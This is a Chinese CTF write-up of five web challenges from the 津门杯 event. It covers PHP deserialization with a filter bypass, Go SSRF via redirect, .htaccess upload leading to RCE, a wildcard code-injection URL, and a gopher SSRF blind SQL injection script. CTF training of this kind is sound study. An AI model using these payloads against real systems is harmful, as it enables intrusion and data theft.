津门杯 – WEB-Write-Up

/ 0评 / 0

WEB

power_cut

index.php.swp 备份拿到源码

<?php
class logger{
    public $logFile;
    public $initMsg;
    public $exitMsg;
    function __construct($file){
        // initialise variables
        $this->initMsg="#--session started--#\n";
        $this->exitMsg="#--session end--#\n";
        $this->logFile =  $file;
        readfile($this->logFile);
    }
    function log($msg){
        $fd=fopen($this->logFile,"a+");
        fwrite($fd,$msg."\n");
        fclose($fd);
    }
    function __destruct(){
        echo "this is destruct";
    }
}
class weblog {
    public $weblogfile;
    function __construct() {
        $flag="system('cat /flag')";
        echo "$flag";
    }
    function __wakeup(){
        // self::waf($this->filepath);
        $obj = new logger($this->weblogfile);
    }
    public function waf($str){
        $str=preg_replace("/[<>*#'|?\n ]/","",$str);
        $str=str_replace('flag','',$str);
        return $str;
    }
    function __destruct(){
        echo "this is destruct";
    }
}
$log = $_GET['log'];
$log = preg_replace("/[<>*#'|?\n ]/","",$log);
$log = str_replace('flag','',$log);
$log_unser = unserialize($log);
?>

简单的反序列化

双写绕一下替换

<?php
class weblog {
    public $weblogfile='/flag';
}
$a = new weblog();
echo serialize($a);
?>
//O:6:"weblog":1:{s:10:"weblogfile";s:5:"/flflagag";}
//flag{EfuteB3QOqvRqD099mHuDRJKWRxnAC47}t

image-20210510165133145

GoOSS

源码中 内网80端有php SSRF

image-20210510165423750

审计GO代码发现可以通过302跳转完成ssrf

image-20210510165630142

需要满足IsDir()

本地起环境发现末尾多加一些/..的时候即可触发302

gin-gonic/gin特性发现双//即可触发SSRF 综合下,payload如下

image-20210510165403094

UploadHub

出题人似乎if写错了又似乎故意的,可以上传任意文件

查看Apache2.conf

image-20210510170017793

发现在配置层面禁止了upload沙盒解析php

搜索资料发现,配置文件的<directory> 晚于htaccess执行,所以确定此题目为.htaccess的利用

测试发现<file>标签比<directory>优先级高

image-20210510170257769

上传htaccess Rce bypass下disablefunc

flag{BNjmiWsBgTW4fsLoDgWLvgnfqk1CI3Nx}

hate_php

http://122.112.214.101:20004/?code=?%3E%3C?=<code>/???/???%20/*?%3E
#   flag{h76ghpt2v2JiYEKzBQ5ysxu9b2Z3mN4A}

image-20210510170808449

easysql

SSRF本地admin.php

gopher post注入 啥过滤也没有

<?php
$payload = "poc=" . $argv[1];
//$payload = "poc=if((select ascii(substr(database(),1,1)))=115,sleep(0.4),1)";
$test = "POST /admin.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
cache-control: no-cache
Postman-Token: 375ba985-8106-4d79-bafd-dff6654589b8
User-Agent: PostmanRuntime/7.6.0
Accept: */*
Host: 127.0.0.1
Content-Length: " . strlen($payload) . "
Connection: close
" . $payload . "
";
echo urlencode(("gopher://127.0.0.1:80/_" . rawurlencode($test)));

python

import requests
import time
import urllib
import os
url = 'http://121.36.147.29:20001/?url='
s=requests.Session()
x=""
payload = ''
for Len in range(1,50):
    max = 127
    min = 34
    while max >= min:
        mid = (max + min) // 2
        payload = 'if((select ascii(substr((select flag from flag),1,{})))>{},sleep(0.2),1)'.format(Len,mid)
        print(payload)
        tmp_r = os.popen('php /Users/ha1c9on/Web/HISTORY/gopher.php "'+payload+'"').read()
        before_time = time.time()
        tmp_url = url+tmp_r
        print(tmp_url)
        r = requests.get(tmp_url)
        after_time = time.time()
        offset = after_time-before_time
        if (offset>2):
            min = mid + 1
        else:
            max = mid
        if max == mid == min:
            x += chr(mid)
            print("success:{} length:{}".format(x, len(x)))
            break
#flag{VqvjbS1O8A1gVWa2aPF44ruiELruVDP1}

image-20210510174709280

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注